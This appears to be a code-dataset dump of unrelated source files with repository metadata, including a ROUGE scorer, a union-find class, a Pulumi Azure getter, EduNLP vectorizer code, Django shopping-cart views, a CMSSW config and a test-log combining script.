intersection = calculate_maximum_matching(all_matches)
return MetricsDict({
'intersection': intersection,
'num_summary_tokens': len(summary_tokens),
'num_reference_tokens': len(reference_tokens)
})
def _add_pr(self, metrics: MetricsDict) -> None:
intersection = metrics['intersection']
num_summary_tokens = metrics['num_summary_tokens']
num_reference_tokens = metrics['num_reference_tokens']
precision = 0.0
if num_summary_tokens != 0.0:
precision = intersection / num_summary_tokens * 100
recall = 0.0
if num_reference_tokens != 0.0:
recall = intersection / num_reference_tokens * 100
if precision + recall == 0:
f1 = 0.0
else:
f1 = 2 * (precision * recall) / (precision + recall)
metrics['precision'] = precision
metrics['recall'] = recall
metrics['f1'] = f1
def _run(self,
summary: SummaryType,
annotation: PyramidAnnotation,
pyramid: Pyramid) -> MetricsDict:
summary_all_scus_to_offsets = self._get_summary_scu_to_offsets(annotation)
standard_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0, 'num_scu_matches': 0, 'num_non_scu_matches': 0})
scu_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0})
non_scu_counts = MetricsDict({'intersection': 0, 'num_summary_tokens': 0, 'num_reference_tokens': 0})
total_common_scus = 0
for i, reference in enumerate(pyramid.summaries):
reference_all_scus_to_offsets = self._get_reference_scu_to_offsets(pyramid, i)
valid_scus = self._get_scu_intersection(annotation, pyramid, i)
total_common_scus += len(valid_scus)
# Take only the SCUs which are common between the summary and reference
summary_scus_to_offsets = self._filter_scu_to_offsets(summary_all_scus_to_offsets, valid_scus)
reference_scus_to_offsets = self._filter_scu_to_offsets(reference_all_scus_to_offsets, valid_scus)
# Tokenize each
summary_tokens, summary_index_to_scus = self._tokenize(annotation.summary, summary_scus_to_offsets)
reference_tokens, reference_index_to_scus = self._tokenize(reference, reference_scus_to_offsets)
# Compute ROUGE
standard_counts += self._compute_standard_rouge(summary_tokens, summary_index_to_scus,
reference_tokens, reference_index_to_scus)
scu_counts += self._compute_scu_rouge(summary_tokens, summary_index_to_scus,
reference_tokens, reference_index_to_scus)
non_scu_counts += self._compute_non_scu_rouge(summary_tokens, summary_index_to_scus,
reference_tokens, reference_index_to_scus)
avg_common_scus = total_common_scus / len(pyramid.summaries)
self._add_pr(standard_counts)
self._add_pr(scu_counts)
self._add_pr(non_scu_counts)
return MetricsDict({
'common_scus': avg_common_scus,
'standard-rouge': standard_counts,
'scu-rouge': scu_counts,
'non-scu-rouge': non_scu_counts,
})
def score_multi_all(self,
annotations_list: List[List[PyramidAnnotationField]],
pyramid_list: List[PyramidField]) -> List[List[MetricsDict]]:
# Just take the data, not the fields
summaries_list = [[field.summary for field in fields] for fields in annotations_list]
annotations_list = [[field.annotation for field in fields] for fields in annotations_list]
pyramid_list = [field.pyramid for field in pyramid_list]
metrics_lists = []
from tqdm import tqdm
for summaries, annotations, pyramid in tqdm(zip(summaries_list, annotations_list, pyramid_list), total=len(annotations_list)):
metrics_lists.append([])
for summary, annotation in zip(summaries, annotations):
metrics_lists[-1].append(self._run(summary, annotation, pyramid))
return metrics_lists
| [
"danfdeutsch@gmail.com"
] | danfdeutsch@gmail.com |
ad68caba3c69fd1be9e8dfe396a14348fe8f627a | c79a397e81ecefbf66236d763e86a2d4a431449f | /union_find/union_find_2.py | 97d4712392ff9e40b3fce8913eb53141654f497b | [] | no_license | liweiwei1419/Algorithms-Learning-Python | f9acd83598cfa38dbc35e93bd5ff4655a9836867 | 0288097ea6d49d6fc224c3879709ac0d6e9e5b97 | refs/heads/master | 2021-07-12T23:16:29.938315 | 2020-06-17T05:25:14 | 2020-06-17T05:25:14 | 162,683,186 | 12 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | # 并查集第 2 版:设置 parent 数组,查找就变得慢了一些,得一直向上查找;
# 合并的时候,就快了,把其中一个节点的父节点指向另一个节点即可。
# 参考:慕课网:liuyubobobo。
class UnionFind2:
def __init__(self, n):
# 直接就初始化了,每个元素的 id 就是自己
# 有多少个元素,就有多少个类
self.parent = [i for i in range(n)]
self.count = n # 数据的个数
def find(self, p):
"""
查找元素 p 根节点的编号
:param p:
:return:
"""
assert 0 <= p < self.count
while p != self.parent[p]:
p = self.parent[p]
return p
def is_connected(self, p, q):
"""
查询元素 p 和 q 是否属于同一个集合
有共同的父亲,就表示它们属于同一个集合
:param p:
:param q:
:return:
"""
return self.find(p) == self.find(q)
def union(self, p, q):
"""
合并元素 p 和元素 q 所属于的集合
O(n)复杂度
:param p:
:param q:
:return:
"""
p_id = self.find(p)
q_id = self.find(q)
if p_id == q_id:
return
else:
# 任意将其中一个结点的父结点指向另一个结点的父结点
self.parent[p_id] = q_id
| [
"121088825@qq.com"
] | 121088825@qq.com |
79151c6482fa1c5ea36b8410d8aa1744130ace4d | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/network/v20200601/get_network_security_group.py | f352aef2112ebad1522df70a471a32ab1c6f2ce5 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,422 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetNetworkSecurityGroupResult',
'AwaitableGetNetworkSecurityGroupResult',
'get_network_security_group',
]
@pulumi.output_type
class GetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
"""
def __init__(__self__, default_security_rules=None, etag=None, flow_logs=None, id=None, location=None, name=None, network_interfaces=None, provisioning_state=None, resource_guid=None, security_rules=None, subnets=None, tags=None, type=None):
if default_security_rules and not isinstance(default_security_rules, list):
raise TypeError("Expected argument 'default_security_rules' to be a list")
pulumi.set(__self__, "default_security_rules", default_security_rules)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if flow_logs and not isinstance(flow_logs, list):
raise TypeError("Expected argument 'flow_logs' to be a list")
pulumi.set(__self__, "flow_logs", flow_logs)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if network_interfaces and not isinstance(network_interfaces, list):
raise TypeError("Expected argument 'network_interfaces' to be a list")
pulumi.set(__self__, "network_interfaces", network_interfaces)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if resource_guid and not isinstance(resource_guid, str):
raise TypeError("Expected argument 'resource_guid' to be a str")
pulumi.set(__self__, "resource_guid", resource_guid)
if security_rules and not isinstance(security_rules, list):
raise TypeError("Expected argument 'security_rules' to be a list")
pulumi.set(__self__, "security_rules", security_rules)
if subnets and not isinstance(subnets, list):
raise TypeError("Expected argument 'subnets' to be a list")
pulumi.set(__self__, "subnets", subnets)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="defaultSecurityRules")
def default_security_rules(self) -> Sequence['outputs.SecurityRuleResponse']:
"""
The default security rules of network security group.
"""
return pulumi.get(self, "default_security_rules")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="flowLogs")
def flow_logs(self) -> Sequence['outputs.FlowLogResponse']:
"""
A collection of references to flow log resources.
"""
return pulumi.get(self, "flow_logs")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
"""
A collection of references to network interfaces.
"""
return pulumi.get(self, "network_interfaces")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the network security group resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> str:
"""
The resource GUID property of the network security group resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
"""
A collection of security rules of the network security group.
"""
return pulumi.get(self, "security_rules")
@property
@pulumi.getter
def subnets(self) -> Sequence['outputs.SubnetResponse']:
"""
A collection of references to subnets.
"""
return pulumi.get(self, "subnets")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkSecurityGroupResult(GetNetworkSecurityGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkSecurityGroupResult(
default_security_rules=self.default_security_rules,
etag=self.etag,
flow_logs=self.flow_logs,
id=self.id,
location=self.location,
name=self.name,
network_interfaces=self.network_interfaces,
provisioning_state=self.provisioning_state,
resource_guid=self.resource_guid,
security_rules=self.security_rules,
subnets=self.subnets,
tags=self.tags,
type=self.type)
def get_network_security_group(expand: Optional[str] = None,
network_security_group_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
:param str expand: Expands referenced resources.
:param str network_security_group_name: The name of the network security group.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['networkSecurityGroupName'] = network_security_group_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20200601:getNetworkSecurityGroup', __args__, opts=opts, typ=GetNetworkSecurityGroupResult).value
return AwaitableGetNetworkSecurityGroupResult(
default_security_rules=__ret__.default_security_rules,
etag=__ret__.etag,
flow_logs=__ret__.flow_logs,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
network_interfaces=__ret__.network_interfaces,
provisioning_state=__ret__.provisioning_state,
resource_guid=__ret__.resource_guid,
security_rules=__ret__.security_rules,
subnets=__ret__.subnets,
tags=__ret__.tags,
type=__ret__.type)
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
bef751699b606c824c94c94c6c1eafcd6fb8ca0d | d6760033989f2abbd94d68651eb54a8aac4ac61f | /EduNLP/I2V/i2v.py | c997537646c7d0274d0238f22d02aaf311c0d5fe | [
"Apache-2.0"
] | permissive | astrojuanlu/EduNLP | ba636cf39adc1580d0c2f3bf6f0646139f406c72 | 51bbf2e20828f12eed2f9cd8d176c8650ec357ef | refs/heads/master | 2023-07-16T23:27:38.606705 | 2021-08-13T11:38:46 | 2021-08-13T11:38:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,967 | py | # coding: utf-8
# 2021/8/1 @ tongshiwei
import json
from EduNLP.constant import MODEL_DIR
from ..Vector import T2V, get_pretrained_t2v as get_t2v_pretrained_model
from ..Tokenizer import Tokenizer, get_tokenizer
from EduNLP import logger
__all__ = ["I2V", "D2V", "get_pretrained_i2v"]
class I2V(object):
"""
Parameters
----------
tokenizer: str
the tokenizer name
t2v: str
the name of token2vector model
args:
the parameters passed to t2v
tokenizer_kwargs: dict
the parameters passed to tokenizer
pretrained_t2v: bool
kwargs:
the parameters passed to t2v
"""
def __init__(self, tokenizer, t2v, *args, tokenizer_kwargs: dict = None, pretrained_t2v=False, **kwargs):
self.tokenizer: Tokenizer = get_tokenizer(tokenizer, **tokenizer_kwargs if tokenizer_kwargs is not None else {})
if pretrained_t2v:
logger.info("Use pretrained t2v model %s" % t2v)
self.t2v = get_t2v_pretrained_model(t2v, kwargs.get("model_dir", MODEL_DIR))
else:
self.t2v = T2V(t2v, *args, **kwargs)
self.params = {
"tokenizer": tokenizer,
"tokenizer_kwargs": tokenizer_kwargs,
"t2v": t2v,
"args": args,
"kwargs": kwargs,
"pretrained_t2v": pretrained_t2v
}
def __call__(self, items, *args, **kwargs):
return self.infer_vector(items, *args, **kwargs)
def tokenize(self, items, indexing=True, padding=False, key=lambda x: x, *args, **kwargs) -> list:
return self.tokenizer(items, key=key, *args, **kwargs)
def infer_vector(self, items, tokenize=True, indexing=False, padding=False, key=lambda x: x, *args,
**kwargs) -> tuple:
raise NotImplementedError
def infer_item_vector(self, tokens, *args, **kwargs) -> ...:
return self.infer_vector(tokens, *args, **kwargs)[0]
def infer_token_vector(self, tokens, *args, **kwargs) -> ...:
return self.infer_vector(tokens, *args, **kwargs)[1]
def save(self, config_path, *args, **kwargs):
with open(config_path, "w", encoding="utf-8") as wf:
json.dump(self.params, wf, ensure_ascii=False, indent=2)
@classmethod
def load(cls, config_path, *args, **kwargs):
with open(config_path, encoding="utf-8") as f:
params: dict = json.load(f)
tokenizer = params.pop("tokenizer")
t2v = params.pop("t2v")
args = params.pop("args")
kwargs = params.pop("kwargs")
params.update(kwargs)
return cls(tokenizer, t2v, *args, **params)
@classmethod
def from_pretrained(cls, name, model_dir=MODEL_DIR, *args, **kwargs):
raise NotImplementedError
@property
def vector_size(self):
return self.t2v.vector_size
class D2V(I2V):
def infer_vector(self, items, tokenize=True, indexing=False, padding=False, key=lambda x: x, *args,
**kwargs) -> tuple:
tokens = self.tokenize(items, return_token=True, key=key) if tokenize is True else items
return self.t2v(tokens, *args, **kwargs), None
@classmethod
def from_pretrained(cls, name, model_dir=MODEL_DIR, *args, **kwargs):
return cls("text", name, pretrained_t2v=True, model_dir=model_dir)
MODELS = {
"d2v_all_256": [D2V, "d2v_all_256"],
"d2v_sci_256": [D2V, "d2v_sci_256"],
"d2v_eng_256": [D2V, "d2v_eng_256"],
"d2v_lit_256": [D2V, "d2v_lit_256"],
}
def get_pretrained_i2v(name, model_dir=MODEL_DIR):
"""
Parameters
----------
name
model_dir
Returns
-------
i2v model: I2V
"""
if name not in MODELS:
raise KeyError(
"Unknown model name %s, use one of the provided models: %s" % (name, ", ".join(MODELS.keys()))
)
_class, *params = MODELS[name]
return _class.from_pretrained(*params, model_dir=model_dir)
| [
"tongsw@mail.ustc.edu.cn"
] | tongsw@mail.ustc.edu.cn |
1737e0ac93fbb31b8c0c2ca19e4a967752a4fe63 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_12779.py | d005d262e57c58ff952354482c61c6a895f0861a | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | # mt.exe -inputresource:c:\windows\syswow64\python27.dll;#2 -outputresource:pyodbcconf.pyd;#2
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
65df576fdc5cfc020fcc2a479833143bab79a4c7 | fdb8760664d33626e8cf94330dbaeb639d7ecf84 | /axf/app/views.py | 45c80aac25df5e9f0b3edbb7cbdeffd43a29ff1c | [] | no_license | biaozaidashen/django | ef812494e756a71a8366d58ea285bbf57ee2addb | a1e2aba1d29a415c31b984ec27efbe42d15803ad | refs/heads/master | 2020-03-23T01:37:36.472866 | 2018-08-28T13:02:49 | 2018-08-28T13:02:49 | 140,927,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,478 | py | import random
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from app.models import MainWheel, MainNav, MainMustBuy, MainShop, MainShow, FoodType, Goods, CartModel, OrderModel, \
OrderGoodsModel
from django.core.urlresolvers import reverse
from user.models import UserTicketModel
def home(request):
if request.method == 'GET':
mainwheels = MainWheel.objects.all()
mainnavs = MainNav.objects.all()
mainmustbuys = MainMustBuy.objects.all()
mainshops = MainShop.objects.all()
mainshows = MainShow.objects.all()
data = {
'title': '首页',
'mainwheels': mainwheels,
'mainnavs': mainnavs,
'mainmustbuys': mainmustbuys,
'mainshops': mainshops,
'mainshows': mainshows,
}
return render(request, 'home/home.html', data)
def mine(request):
#个人中心
if request.method == 'GET':
user = request.user
orders = OrderModel.objects.filter(user=user)
payed, wait_pay = 0, 0
for order in orders:
if order.o_status == 0:
wait_pay += 1
if order.o_status == 1:
payed += 1
data = {
'wait_pay': wait_pay, # 待付款的订单数量
'payed': payed, #待收货的订单量
}
return render(request, 'mine/mine.html', data)
def market(request):
if request.method == 'GET':
return HttpResponseRedirect(reverse('app:market_params', args=('104749', '0', '0')))
def user_market(request, typeid, cid, sid):
"""
:param request:
:param typeid: 分类id
:param cid: 子分类id
:param sid: 排序id
:return:
"""
if request.method == 'GET':
ticket = request.COOKIES.get('ticket')
user_ticket = UserTicketModel.objects.filter(ticket=ticket).first()
if user_ticket:
#由于market页面没有通过中间件做登录验证,所以只能通过这种方式拿到用户
user = user_ticket.user
else:
user = ''
if user:
user_cart = CartModel.objects.filter(user=user)#返回购物车信息
else:
user_cart = ''
foodtypes = FoodType.objects.all()
#获取某分类下的商品
if cid == '0':
goods = Goods.objects.filter(categoryid=typeid)
else:
goods = Goods.objects.filter(categoryid=typeid, childcid=cid)
#重新组装全部分类的参数
#组装结果为[['全部分类','0'], ['酒类':'13550'], ['饮用水':'15431']]
foodtypes_current = foodtypes.filter(typeid=typeid).first()
if foodtypes_current:
childtypes = foodtypes_current.childtypenames
childtypenames = childtypes.split('#')
child_list = []
for childtypename in childtypenames:
child_type_info = childtypename.split(':')
child_list.append(child_type_info)
#排序
if sid == '0': #默认排序,不做处理
pass
if sid == '1':
goods = goods.order_by('productnum')# 以销量排序
if sid == '2':
goods = goods.order_by('-price')
if sid == '3':
goods = goods.order_by('price')
data = {
'foodtypes': foodtypes,
'goods': goods,
'typeid': typeid,
'child_list': child_list,
'cid': cid,
'user_cart': user_cart,
}
return render(request, 'market/market.html', data)
def add_cart(request):
"""添加商品到购物车"""
if request.method == 'POST':
user = request.user
goods_id = request.POST.get('goods_id')
#判断用户是否是系统自带的anonymouseuser还是自己登录的用户(通过id来判断)
data = {
'code': 200,
'msg': '请求成功'
}
if user.id:
#一个商品就是一个购物车项
user_carts = CartModel.objects.filter(user=user, goods_id=goods_id).first()
if user_carts: #如果购物车中已经存在该商品
user_carts.c_num += 1
user_carts.save()
data['c_num'] = user_carts.c_num
else:
CartModel.objects.create(user=user, goods_id=goods_id)
data['c_num'] = 1
return JsonResponse(data)
data['code'] = 403
data['msg'] = '当前用户没有登录,请去登录'
return JsonResponse(data)
def sub_cart(request):
"""减少购物车用户下单商品数量"""
if request.method == 'POST':
data = {
'code': 200,
'msg': '请求成功'
}
user = request.user
goods_id = request.POST.get('goods_id') #goods_id从js中得来
if user.id:
user_carts = CartModel.objects.filter(user=user, goods_id=goods_id).first()
#如果购物车中已经存在商品信息
if user_carts:
if user_carts.c_num == 1:
#直接删除购物车的商品信息
user_carts.delete()
data['c_num'] = 0
else:
user_carts.c_num -= 1
user_carts.save()
data['c_num'] = user_carts.c_num
return JsonResponse(data)
data['c_num'] = 0
return JsonResponse(data)
data['code'] = 403
data['msg'] = '当前用户没有登录,请去登录'
return JsonResponse(data)
def cart(request):
#购物车
if request.method == 'GET':
#获取用户
user = request.user
#得到所有的购物车项
user_carts = CartModel.objects.filter(user=user)
data = {
'user_carts': user_carts
}
return render(request, 'cart/cart.html', data)
def change_select_status(request):
#改变商品选择状态
if request.method == 'POST':
cart_id = request.POST.get('cart_id') #cart_id是购物车项id ,从js中提交上来的
cart = CartModel.objects.filter(id=cart_id).first() #由id得到购物车项
if cart.is_select:
cart.is_select = False
else:
cart.is_select = True
cart.save()
data = {
'code': 200,
'msg': '请求成功',
'is_select': cart.is_select
}
return JsonResponse(data)
def all_select(request):
#点击全选
if request.method == 'POST':
user = request.user
is_select = request.POST.get('all_select') # 初始值为1
user_carts = CartModel.objects.filter(user=user)
is_select = '0' if is_select == '1' else '1' #点击全选按钮后取反
if is_select == '1':
flag = True
for ca in user_carts:
ca.is_select = True # 作用是将is_select属性值存入数据库
ca.save()
else:
flag = False
for ca in user_carts:
ca.is_select = False
ca.save()
data = {
'code': 200,
'ids': [u.id for u in user_carts],
'flag': flag
}
return JsonResponse(data)
# if is_select == '1':
# user_carts.update(is_select=True)#该步骤是将点击全选按钮后的购物车项的is_select属性值修改后存入数据库
#
#
#
# else:
# flag = True
# user_carts.update(is_select=False)
#
# data = {
# 'code': 200,
# 'ids': [u.id for u in user_carts],#得到购物车项的id列表
# 'flag': flag
# }
# return JsonResponse(data)
def count_price(request):
#求总价
if request.method == 'GET':
user = request.user
user_carts = CartModel.objects.filter(user=user, is_select=True)
count_price = 0
for carts in user_carts:
count_price += carts.goods.price * carts.c_num
data = {
'code': 200,
'count_price': round(count_price, 3),#保留三位小数
'msg': '请求成功',
}
return JsonResponse(data)
def generate_order(request):
#下单
if request.method == 'GET':
user = request.user
#选择勾选的商品进行下单
user_carts = CartModel.objects.filter(user=user, is_select=True)
#判断如果购物车里没有商品则不能下单,并且返回到本页面
if user_carts:
s = 'sdgdyettfyhsygdvysfv134311345568'
o_num = '' # 订单号
for _ in range(30):
o_num += random.choice(s)
# 创建订单
order = OrderModel.objects.create(user=user, o_num=o_num)
for carts in user_carts:
#创建商品和订单之间的关系
OrderGoodsModel.objects.create(goods=carts.goods, order=order, goods_num=carts.c_num)
user_carts.delete()
return render(request, 'order/order_info.html', {'order': order})
else:
return render(request, 'cart/cart.html')
def change_order_status(request):
"""修改订单状态"""
if request.method == 'POST':
order_id = request.POST.get('order_id')
OrderModel.objects.filter(id=order_id).update(o_status=1)
return JsonResponse({'code': 200, 'msg': '请求成功'})
def order_wait_pay(request):
#待付款 o_status=0
if request.method == 'GET':
user = request.user
orders = OrderModel.objects.filter(user=user, o_status=0)
return render(request, 'order/order_list_wait_pay.html', {'orders': orders})
def wait_pay_to_payed(request):
#待付款订单跳转到付款页面
if request.method == 'GET':
order_id = request.GET.get('order_id')
order = OrderModel.objects.filter(id=order_id).first()
return render(request, 'order/order_info.html', {'order': order})
#已付款,待收货,o_status=1
def order_payed(request):
if request.method == 'GET':
user = request.user
orders = OrderModel.objects.filter(user=user, o_status=1)
return render(request, 'order/order_list_payed.html', {'orders': orders})
| [
"you@example.com"
] | you@example.com |
512aa69661fa13678466cf8017c83fe50756b7f7 | cdad738a7085a997b5349a94aedb4db8da78da8f | /PythiaCumulant/test/ConfFile_cfg.py | ed16acb4b043e5f41fcc0791745c74b0c6c9bde2 | [
"MIT"
] | permissive | tuos/DirectLoopAnalysis | 4851d122d4723e498705c1d2cb100cbf3eda8d43 | 6f5f02538454d2240d0232665b9b17d07eb79854 | refs/heads/master | 2020-06-12T22:24:01.081755 | 2020-01-21T17:49:37 | 2020-01-21T17:49:37 | 194,446,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("Demo")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to use
fileNames = cms.untracked.vstring(
'file:/afs/cern.ch/user/t/tuos/work/private/cumulant/loops/CMSSW_9_4_6_patch1/src/PythiaCumulant/PythiaCumulant/test/F2D718DA-3361-E811-B68C-0CC47ABB5178.root'
)
)
process.demo = cms.EDAnalyzer('PythiaCumulant',
src = cms.untracked.InputTag("generator"),
#src = cms.untracked.InputTag("generatorSmeared"),
genParticleSrc = cms.untracked.InputTag("genParticles")
)
process.p = cms.Path(process.demo)
| [
"shengquan.tuo@cern.ch"
] | shengquan.tuo@cern.ch |
9414a6701142d165a30eef94ccded064ddac92a6 | 37cfcdfa3b8f1499f5899d2dfa2a48504a690abd | /test/functional/combine_logs.py | 21e10d9f491b8b44f266a6f5a821e7b93491b7ff | [
"MIT"
] | permissive | CJwon-98/Pyeongtaekcoin | 28acc53280be34b69c986198021724181eeb7d4d | 45a81933a98a7487f11e57e6e9315efe740a297e | refs/heads/master | 2023-08-17T11:18:24.401724 | 2021-10-14T04:32:55 | 2021-10-14T04:32:55 | 411,525,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | #!/usr/bin/env python3
"""Combine logs from multiple pyeongtaekcoin nodes as well as the test_framework log.
This streams the combined log output to stdout. Use combine_logs.py > outputfile
to write to an outputfile.
If no argument is provided, the most recent test directory will be used."""
import argparse
from collections import defaultdict, namedtuple
import heapq
import itertools
import os
import re
import sys
import tempfile
# N.B.: don't import any local modules here - this script must remain executable
# without the parent module installed.
# Should match same symbol in `test_framework.test_framework`.
TMPDIR_PREFIX = "pyeongtaekcoin_func_test_"
# Matches on the date format at the start of the log event
TIMESTAMP_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d{6})?Z")
LogEvent = namedtuple('LogEvent', ['timestamp', 'source', 'event'])
def main():
"""Main function. Parses args, reads the log files and renders them as text or html."""
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'testdir', nargs='?', default='',
help=('temporary test directory to combine logs from. '
'Defaults to the most recent'))
parser.add_argument('-c', '--color', dest='color', action='store_true', help='outputs the combined log with events colored by source (requires posix terminal colors. Use less -r for viewing)')
parser.add_argument('--html', dest='html', action='store_true', help='outputs the combined log as html. Requires jinja2. pip install jinja2')
args = parser.parse_args()
if args.html and args.color:
print("Only one out of --color or --html should be specified")
sys.exit(1)
testdir = args.testdir or find_latest_test_dir()
if not testdir:
print("No test directories found")
sys.exit(1)
if not args.testdir:
print("Opening latest test directory: {}".format(testdir), file=sys.stderr)
log_events = read_logs(testdir)
print_logs(log_events, color=args.color, html=args.html)
def read_logs(tmp_dir):
"""Reads log files.
Delegates to generator function get_log_events() to provide individual log events
for each of the input log files."""
files = [("test", "%s/test_framework.log" % tmp_dir)]
for i in itertools.count():
logfile = "{}/node{}/regtest/debug.log".format(tmp_dir, i)
if not os.path.isfile(logfile):
break
files.append(("node%d" % i, logfile))
return heapq.merge(*[get_log_events(source, f) for source, f in files])
def find_latest_test_dir():
"""Returns the latest tmpfile test directory prefix."""
tmpdir = tempfile.gettempdir()
def join_tmp(basename):
return os.path.join(tmpdir, basename)
def is_valid_test_tmpdir(basename):
fullpath = join_tmp(basename)
return (
os.path.isdir(fullpath)
and basename.startswith(TMPDIR_PREFIX)
and os.access(fullpath, os.R_OK)
)
testdir_paths = [
join_tmp(name) for name in os.listdir(tmpdir) if is_valid_test_tmpdir(name)
]
return max(testdir_paths, key=os.path.getmtime) if testdir_paths else None
def get_log_events(source, logfile):
"""Generator function that returns individual log events.
Log events may be split over multiple lines. We use the timestamp
regex match as the marker for a new log event."""
try:
with open(logfile, 'r', encoding='utf-8') as infile:
event = ''
timestamp = ''
for line in infile:
# skip blank lines
if line == '\n':
continue
# if this line has a timestamp, it's the start of a new log event.
time_match = TIMESTAMP_PATTERN.match(line)
if time_match:
if event:
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
timestamp = time_match.group()
if time_match.group(1) is None:
# timestamp does not have microseconds. Add zeroes.
timestamp_micro = timestamp.replace("Z", ".000000Z")
line = line.replace(timestamp, timestamp_micro)
timestamp = timestamp_micro
event = line
# if it doesn't have a timestamp, it's a continuation line of the previous log.
else:
# Add the line. Prefix with space equivalent to the source + timestamp so log lines are aligned
event += " " + line
# Flush the final event
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
except FileNotFoundError:
print("File %s could not be opened. Continuing without it." % logfile, file=sys.stderr)
def print_logs(log_events, color=False, html=False):
"""Renders the iterator of log events into text or html."""
if not html:
colors = defaultdict(lambda: '')
if color:
colors["test"] = "\033[0;36m" # CYAN
colors["node0"] = "\033[0;34m" # BLUE
colors["node1"] = "\033[0;32m" # GREEN
colors["node2"] = "\033[0;31m" # RED
colors["node3"] = "\033[0;33m" # YELLOW
colors["reset"] = "\033[0m" # Reset font color
for event in log_events:
lines = event.event.splitlines()
print("{0} {1: <5} {2} {3}".format(colors[event.source.rstrip()], event.source, lines[0], colors["reset"]))
if len(lines) > 1:
for line in lines[1:]:
print("{0}{1}{2}".format(colors[event.source.rstrip()], line, colors["reset"]))
else:
try:
import jinja2
except ImportError:
print("jinja2 not found. Try `pip install jinja2`")
sys.exit(1)
print(jinja2.Environment(loader=jinja2.FileSystemLoader('./'))
.get_template('combined_log_template.html')
.render(title="Combined Logs from testcase", log_events=[event._asdict() for event in log_events]))
if __name__ == '__main__':
main()
| [
"cjone98692996@gmail.com"
] | cjone98692996@gmail.com |
